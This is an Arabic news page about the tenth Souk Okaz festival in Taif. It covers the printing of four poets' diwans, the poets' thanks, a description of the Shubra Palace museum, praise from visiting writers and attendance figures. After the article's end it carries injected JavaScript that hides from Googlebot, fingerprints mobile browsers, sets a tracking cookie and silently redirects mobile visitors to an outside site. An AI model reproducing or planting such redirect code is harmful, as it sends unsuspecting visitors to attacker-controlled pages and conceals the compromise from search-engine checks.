مما يذكر أن اللجنة مكونة من الدكتور خالد العصيمي والدكتور راشد الغامدي والدكتور سعيد المالكي .

—————-

  • الفيصل .. يُدشّن مشروع طباعة دواوين شعراء عكاظ

        دشّن صاحب السمو الملكي الأمير خالد الفيصل مستشار خادم الحرمين الشريفين أمير منطقة مكة المكرمة رئيس اللجنة الإشرافية لسوق عكاظ مشروع طباعة “دواوين الشعراء الفائزين بسوق عكاظ” وذلك ضمن فعاليات سوق عكاظ في دورته العاشرة .

       وقال بيان إعلامي للسوق ” إن اللجنة الثقافية أنهت طباعة 4 آلاف نسخة لعدد 4 دواوين ، وهي الخطوة الأولى في المشروع الذي يعبّر بشكل عملي مباشر عن احتضان سوق عكاظ للمبدعين ودعمه لإنتاجهم الشعري والأدبي .

    وأضاف البيان” أن المشروع يعد باكورة مشروع أكاديمية الشعر العربي باعتبارها في طليعة مشاريع عكاظ المستقبل ، والتي تتعاضد مع المشاريع المعرفية والاقتصادية والترفيهية الأخرى التي تنمو وتتوسع بعد كل دورة وصولا إلى الدورة العاشرة الحالية بما تحمله من برامج نوعية وُضعت بعناية بالشراكة بين الجهات المشرفة على سوق عكاظ “.

    أما الدواوين فهي : ” أضواء على رفوف الذاكر” للشاعر حسن طواشي ، و” قصائد كأنها ليست لي” للشاعرة روضة الحاج ، وديوان ” رملة تغسل الماء ” للشاعر حيدر العبدالله ، وديوان ” حبيب الشمس ” للشاعر هزبر محمود .

    من جهته قال أمين سوق عكاظ الدكتور جريدي المنصوري ” أن الدواوين لن تباع وإنما وزعت مجاناً على ضيوف سوق عكاظ ، أثنا التدشين ، وأخرى وزعت في الخيمة الثقافية أثناء الفعاليات ، كما ستوزع نسخ للأندية الأدبية والمكتبات العامة ومكتبات الجامعات ، وكذلك أعطى مجموعة نسخ هدايا للشعراء أصحاب الدواوين ” .

وأضاف المنصوري ” أن المبادرة فرصة مميزة لإيصال صوت الشعراء الشباب عبر بوابة سوق عكاظ إلى مساحة أوسع ، وترسيخ وتعميق حضورهم على الساحة باعتبار أن هذا منتجا إبداعيا ، فهذا دعم آخر من السوق لمواصلة مسيرتهم الإبداعية ، حيث إن اهتمام السوق بالمبدعين لن ينتهي حتى بعد تكريمهم واستلام جوائزهم .

  ——–

  • شعراء دواوين الدورة العاشرة .. شكراً عكاظ

قدم شعراء الدواوين المطبوعة في الدورة العاشرة لسوق عكاظ، شكرهم للقائمين على إدارة وأنشطة وبرامج السوق، وذلك بعد أن حظيت أسماؤهم بشرف أول شعراء يطبع إنتاجهم الأدبي من خلال أكاديمية الشعر العربي .

وأوضح الشاعر العراقي هزبر محمود أن عكاظ لم يعد تكفيه كلمة شكراً بالنسبة له ، حيث لم يكتفِ بتتويجه شاعراً له في الموسم التاسع بل بقي مواكباً له و لرحلته منذ التتويج وحتى الآن متوجاً هذه المواكبة بطباعة ديوانه الشعري الجديد (حبيب الشمس) الذي ضم قصائد كتبها لفترة أكثر من عام و نصف، مشيراً إلى أن لا تكريم ولا فرح يوازي أن يرى الشاعر ديوانه قد طبعته مؤسسة بفخامة سوق عكاظ .

وأوضحت الشاعرة السودانية روضة الحاج أن مبادرة سوق عكاظ بطباعة ديوانها “قصائد كأنها ليست لي” كان لها عظيم الأثر في نفسها، مضيفة أن هذا الشرف ليس لها بل للشعر والشعراء الذي وجد من يرعاه ويهتم به ويحفظه، لافتة النظر إلى أن السوق دأب على رعاية المبدعين ، وإنتاجهم وتقديم أعمالهم على مستوى الثقافة العربية.

وقال الشاعر السعودي حسن طواشي صاحب ديوان “أضواء على رفوف الذاكرة” إنه سيصعد إلى غابات الروح محاولاً قطف ثمار الشكر والامتنان إلى هذا الصرح التاريخي ومن لحظتها إلى حين هبوطه سيترك القلب يقول شكراً عكاظ بكل ما أوتي من بياض، مضيفاً إن جهود سوق عكاظ سبقت الحلم فقد أصبح المبدع السعودي يعلم جيداً أن أرق الكتابة لن يذهب سدى ”  .

من جانبه أفاد الشاعر السعودي حيدر العبدالله صاحب ديوان “رملة تغسل الماء” أنها لحظة جمالية بامتياز تلك التي يجمع الشاعر شتات نصوصه ويبني لها منزلا يؤويها بين ضفتي كتاب، فهي خطوة فارقة وانتقالية في أي تجربة كتابية، مضيفاً أن إسهام عكاظ في تبني طباعة المشاريع الإبداعية، خطوة تحسب للسوق ومنظميه واستمرارية لجهود السوق في الاحتفاء بالتجارب الإبداعية والانتصار لقيم الجمال والحب والشعر ” .

—————-

  • قصر شبرا التاريخي أحد معالم محافظة الطائف البارزة

يعد قصر شبرا التاريخي من أجمل وأهم القصور والمعالم التاريخية والأثرية بمحافظة الطائف بالمملكة العربية السعودية ،وتميز القصر بموقعه الجغرافي ، حيث يقع وسط قلب المحافظة ، وخارج سور الطائف القديم، وفي الشمال الشرقي منه.

وشبرا هي المنطقة الممتدة على شكل مستطيل يفصلها من الناحية الشمالية حي الفيصلية، الطريق الممتد بين المطار وشارع الجيش، وحدها الجنوبي يطل على ميدان باب الحزم وقصر النيابة وحي أسفل، أما الحد الشرقي فيبدأ بالمرتفعات المقابلة لحي الفيصلية من الجهة الجنوبية، ثم ينحرف ويتصل بشريط البنيان الموازي له، والذي يطل من غربه على مزارع شبرا وتمام الحد الشرقي شريط البنيان، وامتداده الذي يطل شرقه على شارع الحرس وحي الشرقية، ويطل غربه على بقية المزارع ومن الجهة الغربية فإن شارع شبرا الرئيس يفصل حي العقيق وحي العزيزية ويشغل هذه المنطقة المستطيلة بستان كبير يحيط بثلاثة قصور أطلق على الأول شبرا القديمة والثاني وهو القائم حاليًّا ، وكان اختيار موقع القصر آنذاك يعود إلى خصوبة الأرض المحيطة به وتوسطه بين البساتين .

  ويمتاز بروعة وفخامة التصميم الذي يعتبر من الأساليب المميزة في العمارة التقليدية ، وذكرياته الجميلة وحكاياته وقصصه المشوقة مع ملوك المملكة على مدى قرن من الزمن .

 وقد أنشئ القصر على يد علي بن عبد الله بن عون باشا بحي شبرا بالطائف عام 1323هـ الموافق ميلادي 1905م وتم الانتهاء منه خلال عامين ،وذلك في عام 1325هـ الموافق ميلادي 1906 ويتميز القصر بطراز معماري مزج بين الطابعين الروماني والإسلامي يتخلله أساليب العمارة التقليدية لمنطقة الحجاز ما يجعله تحفة معمارية جميلة من الداخل والخارج والذي تحف به الأشجار وتزين حجراته وأسقفه النقوش الخشبية الأمر الذي جعله احد المعالم الأثرية الجميلة بالطائف .

   وحول الملك عبدالعزيز آل سعود رحمه الله في بداية حكمه القصر ، مقراً للحكومة أثناء إقامته لموسم الصيف بالطائف ليدير شؤون الحكم في تلك الدولة الفتية ، إلى أن جاء الملك فيصل يرحمه الله فآل إليه القصر من مالكيه بالشراء المباشر ثم فيما بعد أصبح من أملاك الدولة وشغلته وزارة الدفاع والطيران زمناً حتى عام 1407 ثم تم تسليمه بأمر سام إلى وزارة المعارف آنذاك بمسماها السابق، وهي الآن وزارة التعليم ليكون مقرًا لمتحف الآثار في محافظة الطائف، والآن هو تابع لهيئة السياحة والتراث الوطني ليكون مقراً لمتحف الآثار في محافظة الطائف .

    ويتكون القصر من طابق قبو تعلوه أربعة طوابق إضافة لملاحق خارجية وحدائق ، ويضم حوالي 150 غرفة وله عدة مداخل حيث أن بوابته الرئيسة تقع في الجهة الغربية وهي مصنوعة من الخشب المزخرف وللقصر أربع واجهات متشابهة تتخللها أعمدة مصنوعة من النورة والحجارة ، وفي القاعة الرئيسة في القصر يوجد سلم كبير مزدوج خشبي بديع أرضيته من المرمر يمتد حتى الدور الثاني والذي به جناحان يضمان غرفاً كبيرة وأخرى صغيرة وتتميز عقود جدرانها الداخلية والأعمدة والأركان زخرفة ملونة على شكل أوراق نباتية طليت أطرافها باللون الذهبي ، وأيضا نوافذ القصر وأبوابه مصنوعة من الخشب المحفور ذي لمسات فنية وأسقف القصر خشبية مطرزة بأشكال زخرفية ونقوش .

وأوضحت الهيئة العامة للسياحة والتراث الوطني أن المتحف يمكن الزائرين من الاطلاع على ما تحتويه أقسامه وقاعاته الثلاث الرئيسة من إرث تاريخي وإسلامي عريق.

وتضم القاعة الأولى للمتحف (عصور ما قبل الإسلام )، التي تبدأ من العصور الحجرية حتى العصر الجاهلي ، ويتم خلالها عرض مجموعة من القطع الحجرية والفخارية ولوحات من النقوش والكتابات الحجرية، بالإضافة إلى نصوص وصور تحكي عن كل فترة من فترات ما قبل الإسلام .

وتشتمل القاعة الثانية على ( التراث الإسلامي ) الذي يروي مرحلة هجرة الرسول محمد صلى الله عليه وسلم إلى المدينة المنورة وعهد الخلفاء الراشدين والفترات الإسلامية المتتالية, إضافة إلى عرض مجموعة من القطع الأثرية المختلفة ولوحات نصوص وصور ومخططات تعود إلى هذه الفترة .

وتحتوي القاعة الثالثة على ( قصة توحيد المملكة ) منذُ بداية الدولة السعودية الأولى إلى عصرنا الحاضر ، مشتملة على لوحات وصور وأفلام وثائقية تتحدث عن فترات الدولة السعودية والقطع التراثية للمملكة.

ويضم متحف قصر شبرا قاعة للعروض المتحفية، والإدارة، ومعامل التصوير، ومعامل الترميم والمختبر، والمستودع، والمكتبة، ويعمل فيه مرشدون متخصصون في الآثار.

———

– مثقفون وأدباء بسوق عكاظ .. “عكاظ” يمثل بفعالياته رافدًا أصيلًا للثقافة

أكد مثقفون وأدباء شاركوا في فعاليات سوق عكاظ في دورته العاشرة أن السوق بفعالياته الثرية والمتعددة ، يمثل رافدًا أصيلًا للثقافة العربية ويخلق حراكًا كبيرًا في أوساط الشعراء والمثقفين ورواد الكلمة الذين اجتمعوا تحت هذه المظلة التنويرية في هذا الموقع التاريخي، وأنه يمثل القلب النابض للثقافة العربية، ومشيدين بالجهود الجبارة التي لمسوها من خلال الاستقبال والتنظيم وبرامج الفعاليات والندوات الثقافية والأمسيات الشعرية ،  بهذا الحدث الثقافي الكبير.

    وقال مدير مهرجان الشارقة للشعر العربي محمد البريكي ” إن سوق عكاظ هو رمز الأدب عند العرب في جاهليتهم، واليوم تزدهي هذه السوق في ثوبها الجديد لتتواصل الثقافات العربية وتلتحم القصيدة من جديد بجمهورها العريق ” مضيفاً أن السوق يحتضن من خلال فعالياته وبرامجه تراثاً وشعراً وأدباً وحياة نابضة تجدد الطبيعة العربية وتعيد الشعر خاصة إلى أهله.

ويرى البريكي أن السوق يحمل كل الخير للعرب منذ أن برعوا قديماً في استخدام اللغة ووصلوا بها إلى حد خارق في التأويل والتناغم مع مادتها الثرية ،مبيناً أنه تجديد للسيرة الأدبية وبستان عامر بكل ألوان القصيدة التي تتوهج في حضرته وتنسجم مع قدسية المكان.

     من جانبه أكد الباحث الفني المغربي بنيونس عميروش الذي يحضر سوق عكاظ للمرة الأولى أن المشاركة في موسم ثقافي تاريخي عربي بهذا القدر هو شرف لكل مثقف ومفكر ومبدع ، مشيراً إلى أنه ملتقى للأدباء والشعراء والكتاب والمبدعين.

واستطرد عميروش يقول ” إن كل مبدع عربي أصبح يتشوق لحضور سوق عكاظ، فالمشاركة بمثابة فرصة ثرية للتزود الثقافي والمعرفي والاستفادة من تجارب عربية مختلفة ، لافتاً إلى الجهود الجبارة التي لمسها من خلال الاستقبال والتنظيم وبرامج الفعاليات والندوات الثقافية والأمسيات الشعرية، مضيفا أن هناك تقدماً سنة بعد سنة في التنظيم على مستوى الشكل والجوهر وجودة المشاركين .

أما الباحث الهندي محمد عزيز شمس الحق، فوصف حضوره ومشاركته في سوق عكاظ بالحدث السعيد بالنسبة له، موضحاً أنه سمع وقرأ عن السوق أخباراً كثيرة خلال الدورات الماضية مما جعل حضوره إلى السوق أمنية تحققت هذا العام.

وأضاف شمس الحق، الذي يشارك في ندوة المخطوطات المهاجرة ” إن عكاظ مناسبة ثقافية يجتمع فيها الناس ويتبادل فيها المثقفون أمور الثقافة والآراء، فالسوق معناه تبادل للأشياء سواء المادية أو التراثية والثقافية والفكرية والأدبية ، وما إلى ذلك. مشيداً بالجهود الكبيرة التي يلمسها من القائمين على السوق خصوصاً فيما يتعلق بالارتقاء الثقافي والأدبي للعرب وللمهتمين بالتراث العربي العالمي.

وعبرت الشاعرة المغربية حياة نخلي عن سعادتها بالمشاركة الأولى لها في الدورة العاشرة لسوق عكاظ، وقالت ” يسعدني التقائي بالشعراء والتعرف على الجمهور وكيفية تعاطيهم مع القصيدة الحديثة “.

وأضافت ” بأن سوق عكاظ احتفالية كبيرة وتظاهرة شعرية من أنحاء العالم العربي ويجمع أنواع القصيدة العربية، مبينة بأنه سيقدم الكثير للثقافة العربية، موضحة أن جمع ومشاركة هذا العدد الكبير من المثقفين والشعراء على أرض تاريخية سيسهم في الحراك الشعري بين الشعوب العربية.

وبين الشاعر السوري محمد البقاعي أن السمعة الطيبة لإنجازات سوق عكاظ التي تحققت خلال الدورات السابقة تجعل الإنسان العربي يسعد بالمشاركة في الفعالية التي خرجت من إطار المحلية إلى العربية والعالمية، ويتشوق إلى المشاركة فيها والالتقاء بالشعراء والأدباء من مختلف الأوطان ، مضيفاً بأن سوق عكاظ يدخل الحياة اليومية ويتمسك بالتراث وهذا ما يدفع كل مثقف إلى الحرص على المشاركة فيه، حيث إنه أضحى عنواناً للثقافة العربية.

   وأكد ذلك تطور سوق عكاظ وعراقته في الحاضر من خلال رعاية المملكة له؛ وليس بمستغرب على بلد تعنى بالأدب والثقافة وترعى المبدعين والمتميزين، وخصوصاً عندما يشرف على هذه التظاهر الثقافية أمير الشعر والأدب.

————–

  • زوار عكاظ ” 10 ” يشارفون على الـ 400 ألف زائر وزائرة

     حققت الدورة العاشرة لسوق عكاظ رقماً قياسياً جديداً بعدد زوار السوق ، حيث زاره ” 394 ” ألفاً و ”  718 ” زائر وزائرة ، طيلة أيام السوق خلال الفترة من 6 إلى  16 ذي القعدة 1437هـ .

       كشف ذلك مركز المعلومات والأبحاث السياحية “ماس” ، حيث وصف متابعون الدورة الحالية بالدورة الاستثنائية التي شهدت فعاليات متنوعة وبرامج نوعية جذبت الأعداد الكبيرة من داخل المملكة وخارجها ، بالإضافة إلى الحملة الإعلامية ، إضافة إلى تسخير جملة من التقنيات مثل مراكز المعلومات السياحية والهاتف السياحي ورسائل الجوال ، إلى جانب مجموعة مساندة من الأنشطة .

                   // انتهى //

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}